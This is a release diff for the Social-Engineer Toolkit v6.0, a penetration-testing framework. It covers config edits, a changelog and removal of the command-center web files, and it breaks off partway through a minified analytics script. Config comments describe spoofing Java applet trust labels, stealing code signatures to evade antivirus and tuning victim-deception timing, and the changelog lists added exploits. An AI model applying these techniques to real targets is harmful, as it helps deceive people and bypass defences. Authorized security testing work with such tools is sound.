SET v6.0 release.

README.md

@@ -15,7 +15,6 @@ Please read the LICENSE under readme/LICENSE for the licensing of SET.
 
 The Social-Engineer Toolkit is an open-source penetration testing framework designed for Social-Engineering. SET has a number of custom attack vectors that allow you to make a believable attack in a fraction of the time. SET is a product of TrustedSec, LLC - An Information Security consulting firm located in Cleveland, Ohio.
 
-
 ### Bugs and enhancements
 
 For bug reports or enhancements, please open an issue here https://github.com/trustedsec/social-engineer-toolkit/issues

config/set_config

@@ -98,12 +98,9 @@ WEBATTACK_EMAIL=OFF
 ### Web attack time delay between emails default is 1 second
 TIME_DELAY_EMAIL=1
 #
-### Man Left In The Middle port, this will be used for the web server bind port
-MLITM_PORT=80
-#
 ### Use Apache instead of the standard Python web server. This will increase the speed
 ### of the attack vector.
-APACHE_SERVER=OFF
+APACHE_SERVER=ON
 #
 ### Path to the Apache web root
 APACHE_DIRECTORY=/var/www
@@ -113,11 +110,6 @@ APACHE_DIRECTORY=/var/www
 ### You need to specify what port Apache is listening on in order for this to work properly.
 WEB_PORT=80
 #
-### Create self-signed Java applets and spoof publisher note this requires you to
-### install --->  Java 6 JDK, BT5 or Ubuntu users: apt-get install openjdk-6-jdk
-### If this is not installed it will not work. Can also do: apt-get install sun-java6-jdk
-SELF_SIGNED_APPLET=OFF
-#
 ### This flag will set the java id flag within the java applet to something different.
 ### This could be to make it look more believable or for better obfuscation
 JAVA_ID_PARAM=Verified Trusted and Secure (VERIFIED)
@@ -150,23 +142,10 @@ PEM_SERVER=/root/newreq.pem
 ### and harder to convince the victim. 5000 = 5 seconds
 WEBJACKING_TIME=2000
 #
-### Command center interface to bind to by default it is localhost only. If you want to enable it
-### so you can hit the command center remotely put the interface to 0.0.0.0 to bind to all interfaces.
-COMMAND_CENTER_INTERFACE=127.0.0.1
-#
-### Port for the command center
-COMMAND_CENTER_PORT=44444
-#
 ### This will remove the set interactive shell from the menu selection. The SET payloads are large in nature
 ### and things like the pwniexpress need smaller set builds
 SET_INTERACTIVE_SHELL=ON
 #
-### What do you want to use for your default terminal within the command center. The default is xterm
-### the options you have are as follow - gnome, konsole, xterm, solo. If you select solo it will place
-### all results in the same shell you used to open the set-web interface. This is useful if your using
-### something that only has one console, such as an iPhone or iPad.
-TERMINAL=SOLO
-#
 ### Digital signature stealing method must have the pefile Python modules loaded
 ### from http://code.google.com/p/pefile/. Be sure to install this before turning
 ### this flag on!!! This flag gives much better AV detection

config/update_config.py

@@ -46,11 +46,9 @@ def value_type(value):
             'SENDMAIL':False,
             'EMAIL_PROVIDER':True,
             'WEBATTACK_EMAIL':False,
-            'MLITM_PORT':False,
             'APACHE_SERVER':False,
             'APACHE_DIRECTORY':True,
             'WEB_PORT':False,
-            'SELF_SIGNED_APPLET':False,
             'JAVA_ID_PARAM':True,
             'JAVA_REPEATER':False,
             'JAVA_TIME':True,

modules/test_module.example

@@ -5,7 +5,7 @@ from src.core.setcore import *
 import sys
 
 MAIN = "   This is a test module"
-AUTHOR = "   Dave - davek@secmaniac.com"
+AUTHOR = "   Dave - TrustedSec"
 
 # def main(): header is required
 def main():

modules/test_module.readme

@@ -5,7 +5,7 @@ from src.core.setcore import *
 import sys
 
 MAIN="This is a test module"
-AUTHOR="Dave - davek@secmaniac.com"
+AUTHOR="Dave - TrustedSec"
 
 # def main(): header is required
 def main():

readme/CHANGES

@@ -1,3 +1,50 @@
+~~~~~~~~~~~~~~~~
+version 6.0
+~~~~~~~~~~~~~~~~
+
+* fixed psexec which would only bring one shell back instead of as many as you used for the host
+* fixed an issue that would cause metasploit payloads to not be properly generated when using msfvenom, this was due to a code change requiring -f <codetype> 
+* on the update SET menu, it will automatically check if Kali Linux is installed, if it is will automatically enable bleeding edge repos for daily updates to SET
+* added SET to automatically do apt-get update/upgrade/dist-upgrade/autoremove upon checking for updates if using Kali
+* fixed an issue that would cause the MSSQL bruter to throw a payload_options error when powershell was detected, this was due to a file not being written out for payloads.powershell.prep to function properly
+* updated dell drac attack to remove old working and twitter handle
+* upgraded downgrade attack for powershell to server 2008/2012 compatiblity
+* fixed a sql port bug error that would cause the mssql bruter to fail when importing a list without a port
+* fixed an issue in sql bruter when legacy debug method was used if no powershell, would error out when selecting a standard Metasploit payload
+* fixed an issue that was causing a menu mismatch using the web attack vector, when selecting anything above 5 would cause a menu mismtach
+* fixed dr4k0s menu system so when you 99 out, it goes back to the SET menus by returning at that point versus exit(0)
+* removed NAT and cloner from dr4k0s fsattack - it was automatically added based on attack vector, wasn't needed
+* added additional fixes for msfvenom and generating https/http shells
+* fixed an issue that would cause webjacking method to not successfully redirect to index2.html when use APACHE_SERVER=ON
+* made apache_server=on to the default - still configurable in config/set_config
+* fixed a bug that would cause mssql deploy stager on legacy debug64 to throw an error on not finding 1msf.exe - this has since been resolved
+* removed old references to a module that is no longer in SET
+* updated the SET user manual to the latest version 6.0 and incorporated the FSAttack from d4rk0s
+* added ablity for OSX persistence when you have access to the filesystem
+* permenantly removed the command center, will redesign later - no longer needed
+* removed command center wording from SET user manual
+* removed command center options in the set_config
+* removed unused options inside set_config related to mlitm
+* added automatic check to see if bleeding edge repos were enabled or not when using Kali - if kali is in use will prompt to automatically enable bleeding edge repos
+* updated seupdate to reflect bleeding edge repos as well
+* removed self_signed_applet from the config menu - it will not prompt inside of the Java Applet Attack method
+* added ability to use same codebase for the new selection process for SET.
+* redesigned the java applet selection process and allow you to verify new code signign certificates or import your own applet into the java applet attack method
+* added better error handlign when using setoolkit
+* updated the version of RIDENUM to the latest version inside of SET
+* updated the report template to remove secmaniac and update with trustedsec
+* removed old references to secmaniac in various code segments
+* added the MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free from Metasploit
+* added the MS14-012 Microsoft Internet Explorer TextRange Use-After-Free exploit from Metasploit
+* added the MS14-017 Microsoft Word RTF Object Confusion fileformat exploit
+* added a new initial image loader (doctor who theme) - pssssh
+* removed the metasploit update feature - this should be handled through kali and theres packages, distributions, etc. its hard to predict which will be used for Metasploit
+* removed old mentions in update_config that were no longer needed
+* removed the sms attack vector - it hasn't been maintained or updated in a long time and no longer supported
+* added option 99 in qrcode generation to go back a previous menu, it was missing
+* added set ExitOnSession for autorun attack inside of SET
+* changed some of the formating and variable names in the fsattack
+
 ~~~~~~~~~~~~~~~~
 version 5.4.8
 ~~~~~~~~~~~~~~~~

setoolkit

@@ -1,7 +1,6 @@
 #!/usr/bin/python
 import os
 import sys
-import traceback
 
 # if we are running in the path no need to change
 if os.path.isfile("setoolkit"):
@@ -28,12 +27,9 @@ if not os.path.isfile("config/set_config"):
 from src.core.setcore import *
 from src.core.menu import text
 from config.update_config import update_config
-try: import subprocess
-except: reload(subprocess)
-try: import shutil
-except: reload(shutil)
-try: import re
-except: reload(re)
+import subprocess
+import shutil
+import re
 
 # check directory and make it
 if not os.path.isdir("src/logs/"):
@@ -64,6 +60,9 @@ if not os.path.isdir(setdir + "/reports/"):
     os.makedirs(setdir + "/reports")
 
 
+# check bleeding edge
+bleeding_edge()
+
 # check to see if we have python-pycrypto
 try:
     from Crypto.Cipher import AES
@@ -207,20 +206,16 @@ yes (only one time), you agree to the terms of service and that you will only us
             try: reload(src.core.module_handler)
             except: import src.core.module_handler
 
-        # update metasploit
-        if main_menu_choice == '4':
-            update_metasploit()
-
         # update set
-        if main_menu_choice == '5':
+        if main_menu_choice == '4':
             update_set()
 
         # credits
-        if main_menu_choice == '6':
+        if main_menu_choice == '5':
             update_config()
 
         # update config
-        if main_menu_choice == '7':
+        if main_menu_choice == '6':
             help_menu()
 
 # handle keyboard interrupts
@@ -230,7 +225,6 @@ except KeyboardInterrupt:
 # handle exceptions
 except Exception, error:
     log(error)
-    log(traceback.format_exc())
     print "\n\n[!] Something went wrong, printing the error: "+ str(error)
 
 # cleanup routine

seweb

@@ -1,19 +0,0 @@
-#!/usr/bin/env python
-import sys,socket
-try:
-    # import the web interface
-    from src.commandcenter.command_center import *
-
-# except socket errors
-except socket.error:
-    print "[*] Something is already running on the SET web port, please exit it and then restart.\n\n"
-
-# except os errors
-except OSError:
-    pass
-
-# except the rest
-except:
-    print "[*] Exiting the Social-Engineer Toolkit Command-Center"
-    print "[*] Thank you for shopping at the Social-Engineer Toolkit\n"
-    pass

src/autorun/autorun.py

@@ -71,6 +71,7 @@ if trigger == 2 or trigger == 3:
             filewrite.write("set payload " + line[0] + "\n")
             filewrite.write("set lhost " + line[1] + "\n")
             filewrite.write("set lport " + line[2] + "\n")
+            filewrite.write("set ExitOnSession false\n")
             filewrite.write("exploit -j")
             filewrite.close()
         subprocess.Popen("ruby %s/msfconsole -L -r %s/meta_config" % (msf_path, setdir), shell=True).wait()

src/commandcenter/auto_detect.site

@@ -1,7 +0,0 @@
-<br><br>
-<p><b>Network Connection AUTO_DETECT is set to OFF (additional menus)</b><p>
-<br>
-Enter the IP address to your SET web server (external IP or hostname): <input type="text" name="externalip" size="10" STYLE="font-family : arial; font-size : 7pt" /><br>
-<br>
-Enter the IP address for the reverse handler (can be the same) (reverse payload): <input type="text" name="reversehandler" size="10" STYLE="font-family : arial; font-size : 7pt" /><br>
-<br>

src/commandcenter/command_center.html

@@ -1,6 +0,0 @@
-<html>
-<head></head>
-<body>
-STUFFHERE
-</body>
-</html>

src/commandcenter/config_editor.py

@@ -1,30 +0,0 @@
-#!/usr/bin/python
-##############################
-#
-# Configuration Editor
-#
-##############################
-import subprocess
-import os
-import sys
-
-# grab SET directory
-definepath=os.getcwd()
-
-# open configuration file
-
-counter=0
-def html_form(description,field):
-    html_char=(r'%s: <input type="text" name="html_param%s" value="%s"/><br />' % (description,counter,field))
-    print html_char
-
-# start a loop for the set_config
-fileopen=file("config/set_config","r")
-for line in fileopen:
-    # strip any garbage trailing characters
-    line=line.rstrip()
-    # grab anything without comments on it
-    if line[0:1] != "#":
-        line=line.split("=")
-        html_form(line[0],line[1])
-        counter=counter+1

src/commandcenter/ettercap.site

@@ -1,10 +0,0 @@
-<br><br>
-<p><b>Ettercap or DSNIFF is set to ON for ARP/DNS Cache Poisoning (additional menu)</b><p>
-<br>
-Enter the domain name you want to use (* for everything): <input type="text" name="ettercap_ip" size="10" value="*" /><br />
-<br>
-Do you want to use bridged mode (ETTERCAP ONLY):<br>
-<input type="checkbox" name="ettercap_bridge" value="1"> Yes<br>
-<input type="checkbox" name="ettercap_bridge" value="2"> No<br>
-Enter the interface for bridged mode (if your using it) ETTERCAP ONLY: <input type="text" name="bridged_handler" size="5" /><br />
-<br>

src/commandcenter/fasttrack.site

@@ -1,21 +0,0 @@
-				
-		<div class="post">
-		<h4 class="dates">The Social-Engineer Toolkit (SET) Fast-Track Attacks</h4>
-			<div class="entry">
-				<h2>SET - Fast-Track - Web Interface</h2>
-				<p>
-Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing. These will list all of the attack vectors available through the SET interface.
-<br>
-<br><b>Select the attack vector you want:</b>
-<br><br>
-<a href="/autopwn">Metasploit Autopwn</a><br><br>
-<a href="/mssql_bruter">Microsoft SQL Brute Forcer</a><br><br>
-Select the attack vector that you want to perform. 
-</p>
-		
-			</div>  
-		</div> 
-		
-		
-		<br><br>	
-	</div> 

src/commandcenter/files/external-tracking.js

@@ -1,5 +0,0 @@
-jQuery(document).ready(function(){jQuery('a').each(function(){var a=jQuery(this);var href=a.attr('href');if(href==undefined)
-return;var url=href.replace('http://','').replace('https://','');var hrefArray=href.split('.').reverse();var extension=hrefArray[0].toLowerCase();var hrefArray=href.split('/').reverse();var domain=hrefArray[2];var downloadTracked=false;if(jQuery.inArray(extension,analyticsFileTypes)!=-1){downloadTracked=true;a.click(function(){if(analyticsEventTracking=='enabled'){_gaq.push(['_trackEvent','Downloads',extension.toUpperCase(),href]);}else
-_gaq.push(['_trackPageview',analyticsDownloadsPrefix+url]);});}
-if((href.match(/^http/))&&(!href.match(document.domain))&&(downloadTracked==false)){a.click(function(){if(analyticsEventTracking=='enabled'){_gaq.push(['_trackEvent','Outbound Traffic',href.match(/:\/\/(.[^/]+)/)[1],href]);}else
-_gaq.push(['_trackPageview',analyticsOutboundPrefix+url]);});}});});

src/commandcenter/files/ga.js

@@ -1,40 +0,0 @@
-(function(){var aa="_gat",ba="_gaq",r=true,v=false,w=undefined,ca=document,da="4.7.2",y="length",z="cookie",A="location",ea="_gaUserPrefs",fa="ioo",B="&",C="=",D="__utma=",F="__utmb=",G="__utmc=",ga="__utmk=",H="__utmv=",K="__utmz=",L="__utmx=",ha="GASO=";var M=function(i){return w==i||"-"==i||""==i},ia=function(i){return i[y]>0&&" \n\r\t".indexOf(i)>-1},O=function(i,f,m){var u="-",l;if(!M(i)&&!M(f)&&!M(m)){l=i.indexOf(f);if(l>-1){m=i.indexOf(m,l);if(m<0)m=i[y];u=N(i,l+f.indexOf(C)+1,m)}}return u},ka=function(i){var f=v,m=0,u,l;if(!M(i)){f=r;for(u=0;u<i[y];u++){l=i.charAt(u);m+="."==l?1:0;f=f&&m<=1&&(0==u&&"-"==l||".0123456789".indexOf(l)>-1)}}return f},P=function(i,f){var m=encodeURIComponent;return m instanceof Function?f?encodeURI(i):m(i):escape(i)},
-Q=function(i,f){var m=decodeURIComponent,u;i=i.split("+").join(" ");if(m instanceof Function)try{u=f?decodeURI(i):m(i)}catch(l){u=unescape(i)}else u=unescape(i);return u},R=function(i,f){return i.indexOf(f)>-1},S=function(i,f){i[i[y]]=f},U=function(i){return i.toLowerCase()},V=function(i,f){return i.split(f)},la=function(i,f){return i.indexOf(f)},N=function(i,f,m){m=w==m?i[y]:m;return i.substring(f,m)},ma=function(i,f){return i.join(f)},na=function(i){var f=1,m=0,u;if(!M(i)){f=0;for(u=i[y]-1;u>=0;u--){m=
-i.charCodeAt(u);f=(f<<6&268435455)+m+(m<<14);m=f&266338304;f=m!=0?f^m>>21:f}}return f},oa=function(){var i=window,f=w;if(i&&i.gaGlobal&&i.gaGlobal.hid)f=i.gaGlobal.hid;else{f=W();i.gaGlobal=i.gaGlobal?i.gaGlobal:{};i.gaGlobal.hid=f}return f},W=function(){return Math.round(Math.random()*2147483647)},pa=function(i,f){var m=ca.createElement("script");m.type="text/javascript";m.src=i;if(f)m.id=f;(ca.getElementsByTagName("head")[0]||ca.getElementsByTagName("body")[0]).appendChild(m)};var ra=function(i,f){this.Wa=i;this.jb=f},sa=function(){function i(m){var u=[];m=m.split(",");for(var l,o=0;o<m.length;o++){l=m[o].split(":");u.push(new ra(l[0],l[1]))}return u}var f=this;f.Ba="utm_campaign";f.Ca="utm_content";f.Da="utm_id";f.Ea="utm_medium";f.Fa="utm_nooverride";f.Ga="utm_source";f.Ha="utm_term";f.Ia="gclid";f.Y=0;f.z=0;f.Ma=15768E6;f.pb=18E5;f.w=63072E6;f.oa=[];f.qa=[];f.ac="cse";f.bc="q";f.kb=5;f.R=i("daum:q,eniro:search_word,naver:query,images.google:q,google:q,yahoo:p,msn:q,bing:q,aol:query,aol:encquery,lycos:query,ask:q,altavista:q,netscape:query,cnn:query,about:terms,mamma:query,alltheweb:q,voila:rdata,virgilio:qs,live:q,baidu:wd,alice:qs,yandex:text,najdi:q,aol:q,mama:query,seznam:q,search:q,wp:szukaj,onet:qt,szukacz:q,yam:k,pchome:q,kvasir:q,sesam:q,ozu:q,terra:query,mynet:q,ekolay:q,rambler:words");
-f.u=w;f.hb=v;f.h="/";f.S=100;f.ja="/__utm.gif";f.aa=1;f.ba=1;f.v="|";f.$=1;f.Na=1;f.Ka=1;f.c="auto";f.G=1;f.ma=1E3;f.wc=10;f.Hb=10;f.xc=0.2;f.o=w;f.a=document;f.e=window};var ta=function(i){function f(d,a,j,c){var n="",s=0;n=O(d,"2"+a,";");if(!M(n)){d=n.indexOf("^"+j+".");if(d<0)return["",0];n=N(n,d+j[y]+2);if(n.indexOf("^")>0)n=n.split("^")[0];j=n.split(":");n=j[1];s=parseInt(j[0],10);if(!c&&s<o.s)n=""}if(M(n))n="";return[n,s]}function m(d,a){return"^"+ma([[a,d[1]].join("."),d[0]],":")}function u(d,a){var j=d+"; path="+k.h+"; "+a+o.ab();k.a[z]=j}function l(d){var a=new Date;d=new Date(a.getTime()+d);return"expires="+d.toGMTString()+"; "}var o=this,k=i;o.s=(new Date).getTime();
-var g=[D,F,G,K,H,L,ha];o.k=function(){var d=k.a[z];return k.o?o.Ob(d,k.o):d};o.Ob=function(d,a){var j=[],c,n;for(c=0;c<g[y];c++){n=f(d,g[c],a)[0];M(n)||(j[j[y]]=g[c]+n+";")}return j.join("")};o.m=function(d,a,j){var c=j>0?l(j):"";if(k.o){a=o.Yb(k.a[z],d,k.o,a,j);d="2"+d;c=j>0?l(k.w):""}u(d+a,c)};o.Yb=function(d,a,j,c,n){var s="";n=n||k.w;c=m([c,o.s+n*1],j);s=O(d,"2"+a,";");if(!M(s)){d=m(f(d,a,j,r),j);s=ma(s.split(d),"");return s=c+s}return c};o.ab=function(){return M(k.c)?"":"domain="+k.c+";"}};var ua=function(i){function f(q){q=q instanceof Array?q.join("."):"";return M(q)?"-":q}function m(q,b){var e=[],h;if(!M(q)){e=q.split(".");if(b)for(h=0;h<e[y];h++)ka(e[h])||(e[h]="-")}return e}function u(q,b,e){var h=c.K,p,t;for(p=0;p<h[y];p++){t=h[p][0];t+=M(b)?b:b+h[p][4];h[p][2](O(q,t,e))}}var l,o,k,g,d,a,j,c=this,n,s=i;c.j=new ta(i);c.gb=function(){return w==n||n==c.N()};c.k=function(){return c.j.k()};c.ha=function(){return d?d:"-"};c.sb=function(q){d=q};c.ua=function(q){n=ka(q)?q*1:"-"};c.ga=
-function(){return f(a)};c.va=function(q){a=m(q)};c.Nb=function(){c.j.m(H,"",-1)};c.Zb=function(){return n?n:"-"};c.ab=function(){return M(s.c)?"":"domain="+s.c+";"};c.ea=function(){return f(l)};c.qb=function(q){l=m(q,1)};c.B=function(){return f(o)};c.ta=function(q){o=m(q,1)};c.fa=function(){return f(k)};c.rb=function(q){k=m(q,1)};c.ia=function(){return f(g)};c.tb=function(q){g=m(q);for(q=0;q<g[y];q++)if(q<4&&!ka(g[q]))g[q]="-"};c.Vb=function(){return j};c.qc=function(q){j=q};c.Kb=function(){l=[];
-o=[];k=[];g=[];d=w;a=[];n=w};c.N=function(){var q="",b;for(b=0;b<c.K[y];b++)q+=c.K[b][1]();return na(q)};c.pa=function(q){var b=c.k(),e=v;if(b){u(b,q,";");c.ua(c.N());e=r}return e};c.mc=function(q){u(q,"",B);c.ua(O(q,ga,B))};c.uc=function(){var q=c.K,b=[],e;for(e=0;e<q[y];e++)S(b,q[e][0]+q[e][1]());S(b,ga+c.N());return b.join(B)};c.Bc=function(q,b){var e=c.K,h=s.h,p;c.pa(q);s.h=b;for(p=0;p<e[y];p++)M(e[p][1]())||e[p][3]();s.h=h};c.Ab=function(){c.j.m(D,c.ea(),s.w)};c.ya=function(){c.j.m(F,c.B(),s.pb)};
-c.Bb=function(){c.j.m(G,c.fa(),0)};c.Aa=function(){c.j.m(K,c.ia(),s.Ma)};c.Cb=function(){c.j.m(L,c.ha(),s.w)};c.za=function(){c.j.m(H,c.ga(),s.w)};c.Dc=function(){c.j.m(ha,c.Vb(),0)};c.K=[[D,c.ea,c.qb,c.Ab,"."],[F,c.B,c.ta,c.ya,""],[G,c.fa,c.rb,c.Bb,""],[L,c.ha,c.sb,c.Cb,""],[K,c.ia,c.tb,c.Aa,"."],[H,c.ga,c.va,c.za,"."]]};var wa=function(i){var f=this,m=i,u=new ua(m),l=!X.Cc(),o=function(){},k=function(g){var d=(new Date).getTime(),a;a=(d-g[3])*(m.xc/1E3);if(a>=1){g[2]=Math.min(Math.floor(g[2]*1+a),m.Hb);g[3]=d}return g};f.F=function(g,d,a,j,c,n){var s,q=m.G,b=m.a[A];u.pa(a);s=V(u.B(),".");if(s[1]<500||j){if(c)s=k(s);if(j||!c||s[2]>=1){if(!j&&c)s[2]=s[2]*1-1;s[1]=s[1]*1+1;g="?utmwv="+da+"&utmn="+W()+(M(b.hostname)?"":"&utmhn="+P(b.hostname))+(m.S==100?"":"&utmsp="+P(m.S))+g;if(0==q||2==q){j=2==q?o:n||o;l&&f.Ta(m.ja+
-g,j)}if(1==q||2==q){g=("https:"==b.protocol?"https://ssl.google-analytics.com/__utm.gif":"http://www.google-analytics.com/__utm.gif")+g+"&utmac="+d+"&utmcc="+f.Rb(a);if(va)g+="&gaq=1";if(X.Va)g+="&aip=1";l&&f.Ta(g,n)}}}u.ta(s.join("."));u.ya()};f.Ta=function(g,d){var a=new Image(1,1);a.src=g;a.onload=function(){a.onload=null;(d||o)()}};f.Rb=function(g){var d=[],a=[D,K,H,L],j,c=u.k(),n;for(j=0;j<a[y];j++){n=O(c,a[j]+g,";");if(!M(n)){if(a[j]==H){n=V(n.split(g+".")[1],"|")[0];if(M(n))continue;n=g+"."+
-n}S(d,a[j]+n+";")}}return P(d.join("+"))}};var Y=function(){var i=this;i.W=[];i.db=function(f){var m,u=i.W,l;for(l=0;l<u.length;l++)m=f==u[l].q?u[l]:m;return m};i.Gb=function(f,m,u,l,o,k,g,d){var a=i.db(f);if(w==a){a=new Y.Eb(f,m,u,l,o,k,g,d);S(i.W,a)}else{a.Ja=m;a.xb=u;a.wb=l;a.ub=o;a.Qa=k;a.vb=g;a.Sa=d}return a}};Y.Db=function(i,f,m,u,l,o){var k=this;k.zb=i;k.wa=f;k.r=m;k.Oa=u;k.mb=l;k.nb=o;k.xa=function(){return"&"+["utmt=item","tid="+P(k.zb),"ipc="+P(k.wa),"ipn="+P(k.r),"iva="+P(k.Oa),"ipr="+P(k.mb),"iqt="+P(k.nb)].join("&utm")}};
-Y.Eb=function(i,f,m,u,l,o,k,g){var d=this;d.q=i;d.Ja=f;d.xb=m;d.wb=u;d.ub=l;d.Qa=o;d.vb=k;d.Sa=g;d.P=[];d.Fb=function(a,j,c,n,s){var q=d.Wb(a),b=d.q;if(w==q)S(d.P,new Y.Db(b,a,j,c,n,s));else{q.zb=b;q.wa=a;q.r=j;q.Oa=c;q.mb=n;q.nb=s}};d.Wb=function(a){var j,c=d.P,n;for(n=0;n<c.length;n++)j=a==c[n].wa?c[n]:j;return j};d.xa=function(){return"&"+["utmt=tran","id="+P(d.q),"st="+P(d.Ja),"to="+P(d.xb),"tx="+P(d.wb),"sp="+P(d.ub),"ci="+P(d.Qa),"rg="+P(d.vb),"co="+P(d.Sa)].join("&utmt")}};var xa=function(i){function f(){var k,g,d;g="ShockwaveFlash";var a="$version",j=l.d?l.d.plugins:w;if(j&&j[y]>0)for(k=0;k<j[y]&&!d;k++){g=j[k];if(R(g.name,"Shockwave Flash"))d=g.description.split("Shockwave Flash ")[1]}else{g=g+"."+g;try{k=new ActiveXObject(g+".7");d=k.GetVariable(a)}catch(c){}if(!d)try{k=new ActiveXObject(g+".6");d="WIN 6,0,21,0";k.AllowScriptAccess="always";d=k.GetVariable(a)}catch(n){}if(!d)try{k=new ActiveXObject(g);d=k.GetVariable(a)}catch(s){}if(d){d=V(d.split(" ")[1],",");d=
-d[0]+"."+d[1]+" r"+d[2]}}return d?d:o}var m=i,u=m.e,l=this,o="-";l.T=u.screen;l.La=!l.T&&u.java?java.awt.Toolkit.getDefaultToolkit():w;l.d=u.navigator;l.U=o;l.sa=o;l.Pa=o;l.la=o;l.ka=1;l.Za=o;l.Sb=function(){var k;if(u.screen){l.U=l.T.width+"x"+l.T.height;l.sa=l.T.colorDepth+"-bit"}else if(l.La)try{k=l.La.getScreenSize();l.U=k.width+"x"+k.height}catch(g){}l.la=U(l.d&&l.d.language?l.d.language:l.d&&l.d.browserLanguage?l.d.browserLanguage:o);l.ka=l.d&&l.d.javaEnabled()?1:0;l.Za=m.ba?f():o;l.Pa=P(m.a.characterSet?
-m.a.characterSet:m.a.charset?m.a.charset:o)};l.vc=function(){return B+"utm"+["cs="+P(l.Pa),"sr="+l.U,"sc="+l.sa,"ul="+l.la,"je="+l.ka,"fl="+P(l.Za)].join("&utm")};l.Qb=function(){var k=m.a,g=u.history[y];k=l.d.appName+l.d.version+l.la+l.d.platform+l.d.userAgent+l.ka+l.U+l.sa+(k[z]?k[z]:"")+(k.referrer?k.referrer:"");for(var d=k[y];g>0;)k+=g--^d++;return na(k)}};var Z=function(i,f,m,u){function l(d){var a="";d=U(d.split("://")[1]);if(R(d,"/")){d=d.split("/")[1];if(R(d,"?"))a=d.split("?")[0]}return a}function o(d){var a="";a=U(d.split("://")[1]);if(R(a,"/"))a=a.split("/")[0];return a}var k=u,g=this;g.b=i;g.ob=f;g.s=m;g.cb=function(d){var a=g.da();return new Z.t(O(d,k.Da+C,B),O(d,k.Ga+C,B),O(d,k.Ia+C,B),g.O(d,k.Ba,"(not set)"),g.O(d,k.Ea,"(not set)"),g.O(d,k.Ha,a&&!M(a.I)?Q(a.I):w),g.O(d,k.Ca,w))};g.fb=function(d){var a=o(d),j=l(d);if(R(a,"google")){d=d.split("?").join(B);
-if(R(d,B+k.bc+C))if(j==k.ac)return r}return v};g.da=function(){var d,a=g.ob,j,c,n=k.R;if(!(M(a)||"0"==a||!R(a,"://")||g.fb(a))){d=o(a);for(j=0;j<n[y];j++){c=n[j];if(R(d,U(c.Wa))){a=a.split("?").join(B);if(R(a,B+c.jb+C)){d=a.split(B+c.jb+C)[1];if(R(d,B))d=d.split(B)[0];return new Z.t(w,c.Wa,w,"(organic)","organic",d,w)}}}}};g.O=function(d,a,j){d=O(d,a+C,B);return j=!M(d)?Q(d):!M(j)?j:"-"};g.hc=function(d){var a=k.oa,j=v,c;if(d&&"organic"==d.Q){d=U(Q(d.I));for(c=0;c<a[y];c++)j=j||U(a[c])==d}return j};
-g.bb=function(){var d="",a="";d=g.ob;if(!(M(d)||"0"==d||!R(d,"://")||g.fb(d))){d=d.split("://")[1];if(R(d,"/")){a=N(d,d.indexOf("/"));a=a.split("?")[0];d=U(d.split("/")[0])}if(0==d.indexOf("www."))d=N(d,4);return new Z.t(w,d,w,"(referral)","referral",w,a)}};g.$a=function(d){var a="";if(k.Y){a=d&&d.hash?d.href.substring(d.href.indexOf("#")):"";a=""!=a?a+B:a}a+=d.search;return a};g.Tb=function(){return new Z.t(w,"(direct)",w,"(direct)","(none)",w,w)};g.ic=function(d){var a=v,j,c=k.qa;if(d&&"referral"==
-d.Q){d=U(P(d.V));for(j=0;j<c[y];j++)a=a||R(d,U(c[j]))}return a};g.l=function(d){return w!=d&&d.ib()};g.isNewCampaign=function(d){d=O(d,K+g.b+".",";");var a=d.split(".");d=new Z.t;d.lb(a.slice(4).join("."));if(!g.l(d))return true;a=k.a[A];a=g.$a(a);a=g.cb(a);if(!g.l(a)){a=g.da();g.l(a)||(a=g.bb())}return g.l(a)&&U(d.J())!=U(a.J())};g.getCampaignInformation=function(d,a){if(k.Na){var j="",c="-",n,s=0,q,b,e=g.b;if(d){b=d.k();j=g.$a(k.a[A]);if(k.z&&d.gb()){c=d.ia();if(!M(c)&&!R(c,";")){d.Aa();return}}c=
-O(b,K+e+".",";");n=g.cb(j);if(g.l(n)){j=O(j,k.Fa+C,B);if("1"==j&&!M(c))return}if(!g.l(n)){n=g.da();if(!M(c)&&g.hc(n))return}if(!g.l(n)&&a){n=g.bb();if(!M(c)&&g.ic(n))return}if(!g.l(n))if(M(c)&&a)n=g.Tb();if(g.l(n)){if(!M(c)){s=c.split(".");q=new Z.t;q.lb(s.slice(4).join("."));q=U(q.J())==U(n.J());s=s[3]*1}if(!q||a){b=O(b,D+e+".",";");q=b.lastIndexOf(".");b=q>9?N(b,q+1)*1:0;s++;b=0==b?1:b;d.tb([e,g.s,b,s,n.J()].join("."));d.Aa()}}}}}};
-Z.t=function(i,f,m,u,l,o,k){var g=this;g.q=i;g.V=f;g.Z=m;g.r=u;g.Q=l;g.I=o;g.Ra=k;g.J=function(){var d=[],a=[["cid",g.q],["csr",g.V],["gclid",g.Z],["ccn",g.r],["cmd",g.Q],["ctr",g.I],["cct",g.Ra]],j,c;if(g.ib())for(j=0;j<a[y];j++)if(!M(a[j][1])){c=a[j][1].split("+").join("%20");c=c.split(" ").join("%20");S(d,"utm"+a[j][0]+C+c)}return d.join("|")};g.ib=function(){return!(M(g.q)&&M(g.V)&&M(g.Z))};g.lb=function(d){var a=function(j){return Q(O(d,"utm"+j+C,"|"))};g.q=a("cid");g.V=a("csr");g.Z=a("gclid");
-g.r=a("ccn");g.Q=a("cmd");g.I=a("ctr");g.Ra=a("cct")}};var ya=function(i,f,m,u){function l(j,c,n){var s;if(!M(n)){n=n.split(",");for(var q=0;q<n[y];q++){s=n[q];if(!M(s)){s=s.split(g);if(s[y]==4)c[s[0]]=[s[1],s[2],j]}}}}var o=this,k=f,g=C,d=i,a=u;o.L=m;o.na="";o.p={};o.gc=function(){var j;j=V(O(o.L.k(),H+k+".",";"),k+".")[1];if(!M(j)){j=j.split("|");l(1,o.p,j[1]);o.na=j[0];o.X()}};o.X=function(){o.Ib();var j=o.na,c,n,s="";for(c in o.p)if((n=o.p[c])&&1===n[2])s+=c+g+n[0]+g+n[1]+g+1+",";M(s)||(j+="|"+s);if(M(j))o.L.Nb();else{o.L.va(k+"."+j);o.L.za()}};o.rc=
